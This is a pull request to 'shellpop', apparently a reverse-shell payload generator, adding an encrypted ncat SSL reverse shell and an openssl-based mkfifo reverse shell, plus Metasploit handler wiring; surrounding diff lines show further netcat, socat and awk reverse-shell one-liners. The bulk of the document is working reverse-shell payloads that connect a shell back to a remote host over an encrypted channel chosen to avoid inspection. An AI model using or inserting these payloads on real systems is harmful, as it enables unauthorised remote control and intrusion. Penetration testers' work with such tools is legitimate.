### PR TITLE
Openssl/ncat reverse ssl shell

### DIFF
--- a/bin/shellpop
+++ b/bin/shellpop
@@ -327,7 +327,18 @@ AVAILABLE_SHELLS = [
                 use_handler=reverse_tcp_handler,
                 use_http_stager=LINUX_STAGERS),
 
-            12: Shell("Netcat (Traditional) UDP",
+            12: Shell("Ncat SSL TCP",
+                "ncat_ssl",
+                "reverse",
+                "tcp",
+                REVERSE_NCAT_SSL(),
+                system="linux",
+                lang="bash",
+                arch="Independent",
+                use_handler=reverse_tcp_handler,
+                use_http_stager=LINUX_STAGERS),
+
+            13: Shell("Netcat (Traditional) UDP",
                 "netcat_traditional",
                 "reverse",
                 "udp",
@@ -338,7 +349,7 @@ AVAILABLE_SHELLS = [
                 use_handler=None,
                 use_http_stager=LINUX_STAGERS),
 
-            13: Shell("Netcat (Traditional) TCP",
+            14: Shell("Netcat (Traditional) TCP",
                 "netcat_traditional",
                 "reverse",
                 "tcp",
@@ -349,7 +360,7 @@ AVAILABLE_SHELLS = [
                 use_handler=reverse_tcp_handler,
                 use_http_stager=LINUX_STAGERS),
 
-            14: Shell("Netcat (OpenBSD) mkfifo TCP",
+            15: Shell("Netcat (OpenBSD) mkfifo TCP",
                 "netcat_openbsd",
                 "reverse",
                 "tcp",
@@ -360,7 +371,7 @@ AVAILABLE_SHELLS = [
                 use_handler=reverse_tcp_handler,
                 use_http_stager=LINUX_STAGERS),
 
-            15: Shell("Netcat (OpenBSD) mknod TCP",
+            16: Shell("Netcat (OpenBSD) mknod TCP",
                 "netcat_openbsd",
                 "reverse",
                 "tcp",
@@ -371,7 +382,7 @@ AVAILABLE_SHELLS = [
                 use_handler=reverse_tcp_handler,
                 use_http_stager=LINUX_STAGERS),
 
-            16: Shell("Telnet mkfifo TCP",
+            17: Shell("Telnet mkfifo TCP",
                 "telnet_mkfifo",
                 "reverse",
                 "tcp",
@@ -382,7 +393,7 @@ AVAILABLE_SHELLS = [
                 use_handler=reverse_tcp_handler,
                 use_http_stager=LINUX_STAGERS),
 
-            17: Shell("Telnet mknod TCP",
+            18: Shell("Telnet mknod TCP",
                 "telnet_mknod",
                 "reverse",
                 "tcp",
@@ -393,7 +404,18 @@ AVAILABLE_SHELLS = [
                 use_handler=reverse_tcp_handler,
                 use_http_stager=LINUX_STAGERS),
 
-            18: Shell("socat TCP",
+            19: Shell("openssl TCP",
+                "openssl",
+                "reverse",
+                "tcp",
+                REVERSE_OPENSSL(),
+                system="linux",
+                lang="bash",
+                arch="Independent",
+                use_handler=reverse_tcp_handler,
+                use_http_stager=LINUX_STAGERS),
+
+            20: Shell("socat TCP",
                 "socat",
                 "reverse",
                 "tcp",
@@ -404,7 +426,7 @@ AVAILABLE_SHELLS = [
                 use_handler=reverse_tcp_handler,
                 use_http_stager=LINUX_STAGERS),
 
-            19: Shell("awk TCP",
+            21: Shell("awk TCP",
                 "awk",
                 "reverse",
                 "tcp",
@@ -415,7 +437,7 @@ AVAILABLE_SHELLS = [
                 use_handler=reverse_tcp_handler,
                 use_http_stager=LINUX_STAGERS),
 
-            20: Shell("awk UDP",
+            22: Shell("awk UDP",
                 "awk",
                 "reverse",
                 "udp",
@@ -426,7 +448,7 @@ AVAILABLE_SHELLS = [
                 use_handler=None,
                 use_http_stager=LINUX_STAGERS),
             
-            21: Shell("Windows Bat2Ncat TCP",
+            23: Shell("Windows Bat2Ncat TCP",
                 "bat2exe_ncat",
                 "reverse",
                 "tcp",
@@ -437,7 +459,7 @@ AVAILABLE_SHELLS = [
                 use_handler=reverse_tcp_handler,
                 use_http_stager=list(filter(lambda x: x[0] not in [3, 1], WINDOWS_STAGERS))),
 
-            22: Shell("Windows Powershell Shellcode-Injection a.k.a BloodSeeker TCP - x64",
+            24: Shell("Windows Powershell Shellcode-Injection a.k.a BloodSeeker TCP - x64",
                 "powershell_shellcode_injection",
                 "reverse",
                 "tcp",
@@ -448,7 +470,7 @@ AVAILABLE_SHELLS = [
                 use_handler=None,
                 use_http_stager=[(1, PurePowershell_HTTP_Stager)]),  # This will only work with powershell.
             
-            23: Shell("Windows Powershell Tiny TCP",
+            25: Shell("Windows Powershell Tiny TCP",
                 "powershell_tiny",
                 "reverse",
                 "tcp",
@@ -459,7 +481,7 @@ AVAILABLE_SHELLS = [
                 use_handler=reverse_tcp_handler,
                 use_http_stager=[WINDOWS_STAGERS[0]]),
 
-            24: Shell("Windows Powershell Nishang TCP",
+            26: Shell("Windows Powershell Nishang TCP",
                 "powershell_nishang",
                 "reverse",
                 "tcp",
@@ -470,7 +492,7 @@ AVAILABLE_SHELLS = [
                 use_handler=reverse_tcp_handler,
                 use_http_stager=[(1, PurePowershell_HTTP_Stager)]),
 
-            25: Shell("Windows Powershell Nishang ICMP",
+            27: Shell("Windows Powershell Nishang ICMP",
                 "powershell_nishang",
                 "reverse",
                 "icmp",
@@ -481,7 +503,7 @@ AVAILABLE_SHELLS = [
                 use_handler=None,
                 use_http_stager=[(1, PurePowershell_HTTP_Stager)]),
 
-            26: Shell("Windows Bat2Meterpreter TCP",
+            28: Shell("Windows Bat2Meterpreter TCP",
                 "bat2meterpreter",
                 "reverse",
                 "tcp",
@@ -492,7 +514,7 @@ AVAILABLE_SHELLS = [
                 use_handler=None,
                 use_http_stager=list(filter(lambda x: x[0] not in [1, 3], WINDOWS_STAGERS))),
 
-            27: Shell("Groovy TCP",
+            29: Shell("Groovy TCP",
                 "groovy",
                 "reverse",
                 "tcp",

--- a/src/handlers.py
+++ b/src/handlers.py
@@ -188,6 +188,10 @@ class MetaHandler(object):
             else:
                 self.payload = "linux/x86/shell_bind_tcp"
             return
+        elif self.shell.lower() == "ssl":
+            if is_bind is False:
+                self.payload = "python/shell_reverse_tcp_ssl"
+            return
         self.payload = "generic/shell_reverse_tcp"
 
 
@@ -236,7 +240,10 @@ def get_shell_name(shell_obj):
     the receiving shell type for meterpreter upgrade.
     """
     if shell_obj.system_os == "linux":
-        return "bash"
+        if "ssl" in shell_obj.short_name: 
+            return "ssl"
+        else:
+            return "bash"
     if shell_obj.system_os == "windows":
         if "powershell" in shell_obj.short_name:
             return "powershell"

--- a/src/reverse.py
+++ b/src/reverse.py
@@ -47,6 +47,10 @@ def REVERSE_NCAT():
     return "ncat TARGET PORT -e /bin/bash"
 
 
+def REVERSE_NCAT_SSL():
+    return "ncat TARGET PORT --ssl -e /bin/bash"
+
+
 def REVERSE_NC_TRADITIONAL_1():
     return "nc TARGET PORT -c /bin/bash"
 
@@ -73,6 +77,10 @@ def REVERSE_MKNOD_TELNET():
 
 def REVERSE_SOCAT():
     return """socat tcp-connect:TARGET:PORT exec:"bash -li",pty,stderr,setsid,sigint,sane"""
+
+
+def REVERSE_OPENSSL():
+    return "mkfifo /tmp/VAR1; /bin/sh -i < /tmp/VAR1 2>&1 | openssl s_client -quiet -connect TARGET:PORT > /tmp/VAR1; rm /tmp/VAR1"
 
 
 def REVERSE_AWK():


### PR DESCRIPTION
Openssl is default on many nix systems and provides an encrypted connection.  I used the python handler.  Wasn't quite sure what to do with the handler/stager section on shellpop so I just left it with what the others had.  Would like to try adding more ssl shells in the future. 

![screenshot](https://user-images.githubusercontent.com/3400203/52388593-b7284580-2a54-11e9-8e54-ce9c7eb91f4b.png)
